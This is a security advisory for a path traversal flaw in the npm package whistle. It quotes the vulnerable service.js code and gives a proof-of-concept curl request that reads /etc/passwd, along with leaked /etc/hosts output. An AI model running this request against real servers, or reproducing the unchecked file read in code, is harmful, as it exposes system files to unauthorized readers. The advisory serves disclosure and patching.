GHSA-3vfr-4gwf-qxfp

Suggest an improvement
Source
https://github.com/advisories/GHSA-3vfr-4gwf-qxfp
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-3vfr-4gwf-qxfp/GHSA-3vfr-4gwf-qxfp.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-3vfr-4gwf-qxfp
Aliases
Published
2026-08-25T18:32:06Z
Modified
2026-08-26T00:54:29Z
Severity
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator
Summary
Whistle vulnerable to path traversal
Details

This bug was found by nova, which is an automated tool from group of Song Wu, intern, Zhejiang University; BoWang, independent researcher; Xingwei Lin, Zhejiang University.

Vulnerability detail:

In service.js, inside app.get('/cgi-bin/temp/get', ...): var filename = req.query.filename; if (TEMP_FILE_RE.test(filename)) { filename = path.join(TEMP_FILES_PATH, filename); } getFile(filename, ...);

Only when filename matches the temp/ pattern does it get joined to the safe directory TEMP_FILES_PATH.

If it does not match that pattern, the code does not block the request. Instead, it directly uses the user-supplied filename for file reading.

In other words: if you pass passwd, it will read passwd.

POC: curl -s "http://127.0.0.1:8899/cgi-bin/temp/get?filename=/etc/passwd"

response:

xiaoming@192 ~ % curl -s "http://127.0.0.1:8899/cgi-bin/temp/get?filename=/etc/hosts"
{"ec":0,"value":"##\n# Host Database\n#\n# localhost is used to configure the loopback interface\n# when the system is booting.  Do not change this entry.\n##\n127.0.0.1\tlocalhost\n255.255.255.255\tbroadcasthost\n::1             localhost\n199.232.68.133 raw.githubusercontent.com\n199.232.68.133 user-images.githubusercontent.com\n199.232.68.133 avatars2.githubusercontent.com\n199.232.68.133 avatars1.githubusercontent.com\n127.0.0.1 lanyundev.com\n\n127.0.0.1 www.proxifier.com\n127.0.0.1  proxifier.com\n140.82.116.4 github.com\n\n# This line is auto added by aTrustAgent, do not modify, or aTrustAgent may unable to work\n127.0.0.1\tlocalhost.sangfor.com.cn\n\n"}% 
Database specific
{
    "cwe_ids":  [
        "CWE-22"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-08-25T18:32:06Z",
    "nvd_published_at":  "2026-07-16T20:16:45Z",
    "severity":  "HIGH"
}
References

Affected packages

npm / whistle

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
2.10.3

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-3vfr-4gwf-qxfp/GHSA-3vfr-4gwf-qxfp.json"